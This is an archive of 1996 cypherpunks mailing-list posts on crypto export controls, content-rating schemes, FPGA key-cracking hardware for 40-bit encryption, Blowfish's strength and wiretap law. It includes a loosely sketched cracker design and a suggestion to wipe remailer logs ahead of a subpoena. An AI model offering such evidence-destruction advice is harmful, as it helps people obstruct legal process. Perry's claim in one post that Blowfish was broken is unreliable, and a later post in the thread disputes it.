Content-Type: text/plain


>>>>> Steve Reid writes:

SR> Analogy: It would be like putting a license plate on the engine of
SR> a car.  It *could* be done that way, if you redesign the car so
SR> that the engine protrudes out from the back with a place for the
SR> license plate (let the technical people handle the technical
SR> details of that). But the best place for a license plate is on the
SR> outside body of the car, and the best place for content filtering
SR> is at the application layer.

	No, the best place for content filtering is in that grey lump
mounted between the shoulders of most humans.  But that relys too much
on personal responsibility for the NetNannies to accept.  Besides the
fact that most of the NetNannies don't seem to use that grey lump that
often.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
ObCDABait:      For she doted upon their paramours, whose flesh is as the
flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 14 Apr 1996 19:25:58 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604140704.AAA07829@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:33 PM 4/12/96 -0500, Scott Brickner <sjb@universe.digex.net> wrote:
>Actually, I expect configurations like yours to become more widespread
>in the near future.  There are a lot of cable-modem designs that
>basically put an ethernet port on your cable box. 

This leads to the paradoxical situation where your cable TV company
can deliver you motion picture images of sex and nudity on the TV channel,
but it's highly illegal for them to send you the same material as data....
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 14:46:04 +0800
To: jk@digit.ee
Subject: Re: RC4 on FPGAs (Was: Bank transactions on Internet)
Message-ID: <01I3IG4C9C0E8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@digit.ee>

>Once someone gets this kind of cracking device ready, I think it would be
>nice to make the information freely available, or start selling these for
>nominal price.

>This would also make an interesting device connected to Internet. In case
>of fast device people could use it either for free or pay using ecash for
>using it, and crack their SSL sessions. May be Netscape or Microsoft or
>someone else (may be even Community Connexion :) lobbying the government
>for allowing export of strong encryption could sponsor it. It should not
>be so expencive. Much more useful than amazing fish-cam or coke machine on
>Internet.

	It would make it kind of difficult to argue that 40-bit encryption
was anything near the required level, yes. Of course, I'd advise setting it
up _outside_ the US or any other country with a habit of disliking
cryptography - otherwise they'd just find some excuse or another to shut it
down. For instance, you'd probably have to set it up if it were in the US to
check where a request was from, in order to not violate some arcane ITAR rule
or another.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 15:14:01 +0800
To: um@c2.org
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <01I3IGCYMLNS8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: noring@netcom.com (Jon Noring)

>On Wednesday afternoon, February 8th, three private 
>investigators  visited the Caltech Security Office and the Campus 
>Computing Organization. The P.I.s wanted to know the identity of 
>the holder of the account "tc" on the Caltech Alumni Association 
>computer system (alumni.caltech.edu). They claimed to have 
>gotten the account name from the anon.penet.fi server via the 
>Helsinki police. Due to the unusual nature of this request, the 
>P.I.s were told that Caltech would need more information before 
>this type of information could be given out. Later that day, an 
>attorney representing the Church of Scientology called the 
>campus computing support office demanding the name of the 
>account holder. The attorney claimed that a document had been 
>stolen from a CoS computer system, and that the  document had 
>been posted to the a.r.s newsgroup from alumni.caltech.edu via 
>the anon remailer. (The claim was the document was created on 
>Jan. 21 and appeared in a.r.s. on Jan. 24). The computing support 
>staff did not divulge the name of the account holder, and the CoS 
>attorney was referred to the Caltech General Counsel's office.

	Given that they didn't have a subpoena at this point, wouldn't the
simplest way to solve this problem be to wipe the records? Somehow, I suspect
that the judge is unlikely to put Caltech in contempt of court on suspicion
that they're lying about the records being wiped. Now, contempt of court out of
irritation...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 14 Apr 1996 20:18:44 +0800
To: Sten Drescher <stend@grendel.texas.net>
Subject: Digital Ignorance (was Re: Protocols at the point of a gun)
In-Reply-To: <199604140501.AAA00441@grendel.texas.net>
Message-ID: <Pine.BSF.3.91.960413232250.19568B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


SR> the best place for content filtering is at the application layer.

> 	No, the best place for content filtering is in that grey lump
> mounted between the shoulders of most humans.  But that relys too much
> on personal responsibility for the NetNannies to accept.  Besides the
> fact that most of the NetNannies don't seem to use that grey lump that
> often.

It *should* be at the "noodle layer", but I think it will be a lot more 
practical to install it at the application layer, unfortunately. :-/

[Note: What follows is a rant, but I think it's an important rant.]

I think parents probably are expecting the internet to be a babysitter
like they expect TV to be. A certain elected official (Exon?) tried to
explain the net, and said it was "like a telephone"... <sigh> In a world 
where TV is about as high-tech as most people get, people don't even 
understand the potential of a single unlinked computer, nevermind the 
potential of the internet and crypto.

Maybe the average person is trying to learn these things without learning
the basics, and thus ends up clueless about everything... If people don't
understand how text, programs, images, sound, video, and eventually ALL
THINGS can be described as a series of ones and zeros, how can they
understand the potential of the internet? It would be like trying to
understand light bulbs without knowing what electricity is. 

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 14 Apr 1996 15:49:34 +0800
To: frantz@netcom.com
Subject: Re: PICS
Message-ID: <01I3IGVW330U8Y51D0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 12-APR-1996 22:58:59.49

>I had a chance for a brief look at the PICS protocol, and it seems to have
>a lot of cypherpunks relevance.  It includes features such as:

>  Multiple third party rating systems
 
	No problem. Although it looks like the CDA-replacement bill would
essentially require using one with at least as great anti-minor censorship
abilities.

>  Digital signatures

	This is a problem, unless one simply deletes the signature on modifying
a message, and takes the deny-everything-to-minors approach.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Sun, 14 Apr 1996 20:16:42 +0800
To: Jeremey Barrett <jeremey@forequest.com>
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <Pine.BSI.3.91.960413221855.7580A-100000@newton.forequest.com>
Message-ID: <Pine.SV4.3.91.960414010416.20213C-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Apr 1996, Jeremey Barrett wrote:

> crypt() is a hash function, and hence is not subject to export restriction.
> (To my knowledge).

SCO (and Novell, when it was selling Unix) both shipped libcrypt.a as a 
seperate product in their development systems.  Only US and Canadian 
customers are allowed to buy the library.  Programs statically compiled
with libcrypt appear to be OK, but furineers can't have API access to
this technology :)

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sun, 14 Apr 1996 20:18:00 +0800
To: Dan Busarow <dan@dpcsys.com>
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <Pine.SV4.3.91.960414010416.20213C-100000@cedb>
Message-ID: <Pine.BSI.3.91.960414014821.7867A-100000@newton.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


Did the library include other encryption functions, other than one-way
functions? If so, I could see it being restricted. Linux, which is freely
available anywhere, includes a DES-using crypt() one-way hash. But since
a one-way hash function (implemented as a one way function) can't really
be used for encrypted communication, I don't think it is subject to
export restriction.

On Sun, 14 Apr 1996, Dan Busarow wrote:

> On Sat, 13 Apr 1996, Jeremey Barrett wrote:
> 
> > crypt() is a hash function, and hence is not subject to export restriction.
> > (To my knowledge).
> 
> SCO (and Novell, when it was selling Unix) both shipped libcrypt.a as a 
> seperate product in their development systems.  Only US and Canadian 
> customers are allowed to buy the library.  Programs statically compiled
> with libcrypt appear to be OK, but furineers can't have API access to
> this technology :)
> 
> Dan
> -- 
>  Dan Busarow
>  DPC Systems
>  Dana Point, California
> 
> 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 14 Apr 1996 18:08:02 +0800
To: cypherpunks@toad.com
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604100832.AA06344@divcom.umop-ap.com>
Message-ID: <9604140611.AA3800@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Jon Leonard" <jleonard@divcom.umop-ap.com> writes:

  > My short answer: Yes, it's that cheap, but only if you already
  > work with the chip vendor and have the software tools to program
  > the chips.  If not, expect to spend many thousands of dollars...

Huh?  We're talking about modern FPGAs here.  The cost of the tools
necessary to actually *program* the damn things is very small, as
almost all of them are SRAM-based and programmed out of an external
EPROM, bus, or serial bitstream.

Sure, we've spent $50,000 on FPGA *development* tools, but we program
the serial EEPROMs themselves on $300 PC-based programmers which are
available -- as are the FPGAs and EEPROMs -- from Digikey, Allied,
Newark, etc., to anyone with a credit card.

Actually, in almost all of our designs, the FPGAs are programmed
in-circuit by application software.  If I were to design a hardware
key cracker, it would almost certainly be a simple ISA-bus card
containing a couple of big Xilinx FPGAs which would get programmed by
a simple C program.

[Funny thing -- there seems to be a lot of "theft" of satellite and
 cable programming by folks who know just enough to use a soldering
 iron, but haven't a clue about what really happens inside a set-top
 box.  How do they manage it, if they don't have the tools to design or
 reverse-engineer a cable converter?  Hmmm...]

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Sun, 14 Apr 1996 20:55:53 +0800
To: Jeremey Barrett <jeremey@forequest.com>
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <Pine.BSI.3.91.960413221855.7580A-100000@newton.forequest.com>
Message-ID: <199604140937.CAA26892@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Jeremey Barrett <jeremey@forequest.com>]
[cc: cypherpunks@toad.com]
[Subject: Re: Is crypt(1) a prohibited export? ]
[In-reply-to: Your message of Sat, 13 Apr 96 22:21:14 MST.]
             <Pine.BSI.3.91.960413221855.7580A-100000@newton.forequest.com> 

While not paying attention, Jeremey Barrett <jeremey@forequest.com> wrote:
>crypt() is a hash function, and hence is not subject to export restriction.
>(To my knowledge).

crypt(3) is a library routine implementing a hash function. Crypt(1) is
a general purpose cryptography program implementing an algorithm similar
to an enigma rotor machine. My question stands.

>On Wed, 10 Apr 1996, Chris McAuliffe wrote:
>> Is crypt(1) a prohibited export from the US? I thought it was. The
>> reason I ask is that it has come to my attention that HP ships that
>> overseas too, with HP-UX versions 9 and 10...

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMXDCjIHskC9sh/+lAQEZ6AQAik5whxKqkICtWaD48dZigxLpCg2LgKDS
juRUVGL4bX1QvnBH9JPhnUDPB7k1y74pT3TBIUm6XD+AMMjxpH4Q6dF5iUiGWPYZ
VDVpUT1R3qQ+Bn9siR7Y3xTShg1oeLLf7T7jQ1wG0/NSV/kd0UwB89XdbrOtH48x
/9Z36ubniy4=
=JQmB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sun, 14 Apr 1996 21:06:38 +0800
To: Chris McAuliffe <cmca@alpha.c2.org>
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <199604140937.CAA26892@eternity.c2.org>
Message-ID: <Pine.BSI.3.91.960414025712.7867B-100000@newton.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Apr 1996, Chris McAuliffe wrote:

> While not paying attention, Jeremey Barrett <jeremey@forequest.com> wrote:
> >crypt() is a hash function, and hence is not subject to export restriction.
> >(To my knowledge).
> 
> crypt(3) is a library routine implementing a hash function. Crypt(1) is
> a general purpose cryptography program implementing an algorithm similar
> to an enigma rotor machine. My question stands.
> 

Ah. My mistake... the man page I have on crypt(1) says this:

RESTRICTIONS
     This program is not available on  software  shipped  outside
     the U.S.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 14 Apr 1996 20:06:08 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: "Contempt" charges likely to increase
In-Reply-To: <199604060105.RAA20223@jobe.shell.portal.com>
Message-ID: <Pine.BSF.3.91.960414032750.22727V-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Apr 1996, Hal wrote:

> I think Tim has hit the nail right on the head with this one.
> 
> I have been quite appalled to read the various analyses on the net (URLs
> not handy, but they have been posted here before I think) which conclude
> that compelled disclosure of a cryptographic pass phrase would probably
> be OK despite the Fifth Amendment.  This seems to be an area where there
> is widespread agreement based on recent precedent.
> 
> In the past, when crypto was not widely used, the issue didn't really
> come up very often.  If a criminal chose to write incriminating
> information diary or financial ledger, and it could be found in a
> search, then it was used as evidence against him.  At one time not even
> this was accepted but it has been this way for many decades.
> 
> But crypto, if it becomes widely and routinely used, raises the bizarre
> spectacle of criminals commonly being forced to produce information
> which will then be used against them!  Imagine if they'd found a file by
> OJ on his computer, encrypted, which he refused to decrypt.  The judge
> could actually jail him for contempt until he revealed the password.
> This could become a routine occurance in many kinds of crimes which rely
> on private records as evidence.
> 
> Currently, I don't think the subpoena power is widely used in criminal
> cases.  Rather, the prosecution relies on search warrants and the element
> of surprise to prevent the destruction of incriminating records.  I think
> there is recognition that in practice subpoenas would not be effective,
> that the records would not be produced, even if contempt charges were the
> result.

Subpoenas *are* widely used in white collar criminal investigations.  
Despite what many of you no doubt believe, investigators and prosecutors 
generally opt for the least intrusive method of getting the information 
needed for the investigation.  Certainly, third parties' records are 
generally subpoenaed rather than seized (absent some articulable reason to 
believe that the records will be altered or destroyed ...).  Even 
companies under investigation are frequently served with subpoenas, not 
warrants, as they usually try to appear to be cooperative while deciding 
which underling to throw to the wolves.

EBD


> If so, then probably the tactic will not be that effective in forcing
> people to reveal cryptographic keys.  Maybe if the jails start filling up
> with defendants who refuse to go along with such order, judges will
> decide that effective secrecy of records is now the new status quo.  The
> law will then once again extend the Fifth Amendment privileges to
> personal papers.
> 
> Hal
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dave.hodgins@westonia.com (DAVE HODGINS)
Date: Sun, 14 Apr 1996 19:45:13 +0800
To: cypherpunks@toad.com
Subject: Re:               UNSUBSCRIVE
In-Reply-To: <199604100656.IAA25040@ekeberg.sn.no>
Message-ID: <8BEA0D9.000101558E.uuout@westonia.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

KJ> Subject: Re: unsubscrive

  I didn't keep the article, but there was a fairly recent post to
the risks digest that mentioned that someone somewhere has set up an
automated address grabber/spoofer of subscribe messages for several
high volume mailing lists.  This assumption was based on the large
number of subscribers being added to the list, who were then complaining
that they had never asked to be added to the list.

  Since the cypherpunks list is a rather high volume list, it shouldn't
be surprising that it may become a tool for annoying people unfamiliar
with mailing lists.

  Regards, Dave Hodgins.

  P.S.  To unsubscribe from the cypherpunks mailing list, send a message
addressed to 
majordomo@toad.com 
  with
unsubscribe cypherpunks
 
  in the body of the message.  the subject is ignored.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMXCrcIs+asmeZwNpAQGyxAf9Fa0DxbyWFQRpnX/l2qMEH0Z4emkKtlGb
SrRd8aUEgl5U4TvKYE556iAZk1mkYC4Gmvah5RQqZl6j3kHOzvZIQ35YkJMS4c9f
OCncSMS6gyRzu0gIiHk4WDi5/8YKz54QspQzqqOlgq4ZSNFfniPIVASq1U3MuUih
Io3dJq8XDSlpaD1kIjwIU/OIC7J4zcjUkYO51J82Qzh+5KII3vKfKv7FezG0N4cv
9v+9VfewWQCxUHVmnpSzdz7boN+wYyzN2GJ+rb7bAmQSv2LEpUBm3QYZlNT0Qiju
H0uzWrQjiEGiy70UM6vcLLD4Uq2TrG/prQKCVu11/5XfTZXnpfk4hg==
=1h8k
-----END PGP SIGNATURE-----

---
 þ RM 1.31 0820 þ Internet:Dave.Hodgins@Westonia.com Rime->1347 Fido 1:250/636




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 19:56:00 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Yadda Yadda] Re: Any examples of mandatory content rating?
In-Reply-To: <m0u8KCD-0008ycC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960414034824.5253F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Apr 1996, jim bell wrote:

> At 10:59 AM 4/13/96 -0400, Black Unicorn wrote:

> >Still, governments are quite talented at making ratings schemes look 
> >voluntary when practically speaking they are not.
> 
> You know, it's amazing how you fail to ask and answer obvious questions when 
> they arise!  Why, exactly, should the government NEED to "make ratings 
> schemes look voluntary when practically speaking they are not"?

(Snore)  If you need me to explain this to you.....

  After  all, 
> you would love to take the position that the government has this authority 
> anyway.  Is it possible you're just afraid to admit that the government(s) 
> doesn't have this authority? 

You have no idea what my position is, so you have to invent it.

Really you grow quite boring.  This begins to fall into pattern behavior.

> system would collapse.  At that point, there will be no government "threat" 
> to regulate, because everybody will realize that the system is working just 
> fine without regulation.  Everyone will see an unregulated Internet, and 
> nobody will see a powerful need to regulate it. 

If you bothered to read what I said, you would notice that you just 
repeated it nearly exactly.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 20:23:19 +0800
To: Jerry Whiting <jwhiting@igc.apc.org>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604140412.VAA24649@igc2.igc.apc.org>
Message-ID: <199604140849.EAA05136@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jerry Whiting writes:
> One reason we chose to use Blowfish as the basis for carrick is that
> it _is_ a new algorithm.  One has to assume that the NSA et al. has
> tools optimized to crack DES and possibly IDEA/RSA.  At least let's
> give them something else to sweat over.

They won't sweat over it long. Blowfish was broken.

> Like I said, we're aiming high.

I believe you are having trouble distinguishing "up" from "down" while
looking through your sights....

> So yes, if we're successful Blowfish should be taken more seriously.

Why? Why exactly would it be hard to produce a crypto package based on
any given algorithm? Its not exactly like Blowfish wasn't out and
available already or anything.

> Our marketing tag ("Encryption software so good, the Feds won't let
> us export it.")

They won't let you export DES and we know how good that is. Heck, they
won't let you export 41 bit RC4 or better and we all know how good 41
bit RC4 would be.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 14 Apr 1996 21:54:13 +0800
To: Cypherpunks <Jean.Chouanard@grenoble.rxrc.xerox.com (Jean Chouanard)
Subject: Re: US crypto laws? Need help!
In-Reply-To: <v02140b18ad91143a0d5e@[13.202.222.150]>
Message-ID: <m0u8PEd-0004L0C@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jean Chouanard writes:

: Hi!
: 
: I was wondering if a foreigner like, with a valid work visa but not a
: permanet green card, is allowed to use crypto in the state.
: 
: If yes, is there any restriction? Depending on crypto methods?
: 
: Thank a lot, Jean

In the U.S. there is no restriction on such a foreigner using crypto,
but it is supposedly a serious crime (ten years in jail and a million
dollar fine maximum) for anyone to disclose cryptographic software to
him or explain how it works.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Mon, 15 Apr 1996 00:58:50 +0800
To: Jeremey Barrett <jeremey@forequest.com>
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <Pine.BSI.3.91.960414014821.7867A-100000@newton.forequest.com>
Message-ID: <Pine.SV4.3.91.960414073239.21515A-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Apr 1996, Jeremey Barrett wrote:

> Did the library include other encryption functions, other than one-way
> functions?

The library includes the functions encrypt(3) and des_encrypt(3).  In the
US-Only version of the library each of these functions accepts a flag
value of 1 to indicate de-cryption, the export version ignores the flag,
decryption is disabled.

> On Sun, 14 Apr 1996, Dan Busarow wrote:
> > seperate product in their development systems.  Only US and Canadian 
> > customers are allowed to buy the library.

I should have said only US and Canadian customers can purchase the uncrippled
version of the library.

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sun, 14 Apr 1996 23:10:47 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Watch your language, Shabbir.
In-Reply-To: <Pine.3.89.9604131930.D22882-0100000@tesla.cc.uottawa.ca>
Message-ID: <3170F667.6EEA@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca wrote:
> > Look, very carefully, at the last paragraph quoted above.  Mr. Safdar
> > says, "No reasonable person is objecting to the FBI's right to conduct
> > a wiretap."
> 
> That's right. Because no reasonable person thinks they can convince Congress
> or the Supremes otherwise. It isn't impossible, but energies are best spent
> elsewhere, like getting the Burns bill passed.

The choice of words was exceedlingly poor if that's what he really meant.
Though I agree that it's unlikely any LEA will give up capabilities it's
grown to imagine is has a "right" to have, I haven't stopped objecting.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 15 Apr 1996 02:16:28 +0800
To: cypherpunks@toad.com
Subject: Re: carrick, Blowfish & the NSA
Message-ID: <199604141545.IAA02699@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Blowfish has not been broken in my opinion.  I wonder if Perry is
thinking of MacGuffin, the block cipher by Schneier and Matt Blaze
based on an asymmetrical Feistel network.  It was broken, and I think
it was at Eurocrypt.

Here is a message from sci.crypt a month ago where Bruce discusses the
status of Blowfish.  A weak key attack is known against a weakened
version, but I think the weak keys are rare.

> From: schneier@parka.winternet.com (Bruce Schneier) 
> Date: 1996/03/14
> MessageID: 4i907g$9lj@blackice.winternet.com#1/1
> 
> The most successful attack against Blowfish to date has been against the
> weak keys (two identical entries in an S-box).  These can be detected in
> a 12-round variant, but not in the full 16 rounds.  I still believe that
> random S-boxes are better than chosen ones, and think that more rounds
> is better than fewer rounds with better S-boxes.  There are a few
> things I would do differently if I was to write the algorithm from scratch
> right now, but on the whole I am still pleased with the results.
> 
> Bruce


Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Apr 1996 02:40:48 +0800
To: Mike McNally <s1113645@tesla.cc.uottawa.ca
Subject: Re: Watch your language, Shabbir.
Message-ID: <m0u8UBq-0008z1C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:58 AM 4/14/96 -0500, Mike McNally wrote:
>s1113645@tesla.cc.uottawa.ca wrote:
>> > Look, very carefully, at the last paragraph quoted above.  Mr. Safdar
>> > says, "No reasonable person is objecting to the FBI's right to conduct
>> > a wiretap."
>> 
>> That's right. Because no reasonable person thinks they can convince Congress
>> or the Supremes otherwise. It isn't impossible, but energies are best spent
>> elsewhere, like getting the Burns bill passed.
>
>The choice of words was exceedlingly poor if that's what he really meant.
>Though I agree that it's unlikely any LEA will give up capabilities it's
>grown to imagine is has a "right" to have, I haven't stopped objecting.
>

Exactly!  I think the issue is important enough so that we really ought to 
develop new wording, something that far more accurately reflects the bulk of our
opinion towards wiretapping.

For years, I've looked at it this way:  Before the telephone era, "all" 
search warrants were probably issued for a specific address, and had to be 
served for a limited time period, a few hours or less.  The owners of the 
location being searched were aware, at the time the search was going on, 
that the search was occuring.  Moreover, once that search ended it was no 
more and those searched were aware of it.

Unlike this, and quite unlike any warrants which preceded it, wiretaps:

1.  Take an almost unlimited time period, compared to a 1-hour search.  
(Yes, they do come to an end, but...)

2.  The users of the telephone line are not informed, while the search 
(wiretap) is being done.

3.  To my knowledge, albeit limited, targets of wiretaps are NOT informed, 
subsequent to the tap, that they have been wiretapped.  Therefore they are 
denied the opportunity to complain, even after the fact.


I see no legal reason why wiretaps should have the "features" listed above.  
There is a certain practical reason they can:  Due to the nature of 
wiretapping, it is not physically necessary to show up to do the tap, or 
tell those targeted, or tell them after the tap has been disconnected.  
However, it seems very unlikely that the mere fact that an invention allows 
a kind of search that was possible before, should automatically change the 
interpretation of the Constitution to allow that search.

If a new invention allowed the cops to walk through walls untraceably, would 
that automatically mean that the normal protections that search warrants are 
supposed to provide are no longer valid?  I don't think so!

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.com (Lee Tien)
Date: Mon, 15 Apr 1996 04:15:23 +0800
To: cypherpunks@toad.com
Subject: math patents
Message-ID: <199604141700.KAA26641@mh1.well.com>
MIME-Version: 1.0
Content-Type: text/plain


In reply to the message excerpted below:

I believe Jim's not looked back far enough.  My recollection from law
school is that the law was friendly to math patents in the period before
the Supreme Court weighed in.  There were some PTO denials, which courts
reversed (I think the Court of Claims heard these back then).  So I think
the trend was toward patenting processes even if mathematical until
Gottschalk v. Benson.  It's a conceptually messy area because "processes"
have long been patentable (like the Morse telegraphy/Bell telephony
patents) but the Supreme Court saw the Benson application as violating the
doctrine against patenting "laws of nature."  

Lee

From: jim bell <jimbell@pacifier.com>
Date: Sat, 06 Apr 1996 14:52:12 -0800
Subject: Re: So, what crypto legislation (if any) is necessary?

At 01:07 PM 4/6/96 -0500, Black Unicorn wrote:

>> I contend that had he talked to Phillip Zimmermann in 1990 or so, he would 
>> have told Zimmermann that "It's illegal to write an encryption program 
using 
>> RSA, because it's patented!  You'll never get away with it!"
>
>I would have indicated that "you're going to face the prospect of 
>intellectual property litigation, and that can get nasty in the extreme."

One thing I've never heard is an explanation of how computer software and 
especially mathematics went from "extremely not patentable" in the early and 
middle 1970's, to "patentable" once Messr's Rivest, Shamir, and Adleman 
invented a piece of mathematics that the government wanted to deny to the 
public.  How convenient.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Mon, 15 Apr 1996 03:12:07 +0800
To: cypherpunks@toad.com
Subject: Blowfish ain't broken
Message-ID: <199604141628.JAA17215@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Jerry Whiting writes:
> > One reason we chose to use Blowfish as the basis for carrick is that
> > it _is_ a new algorithm.  One has to assume that the NSA et al. has
> > tools optimized to crack DES and possibly IDEA/RSA.  At least let's
> > give them something else to sweat over.
> 
> Perry writes:
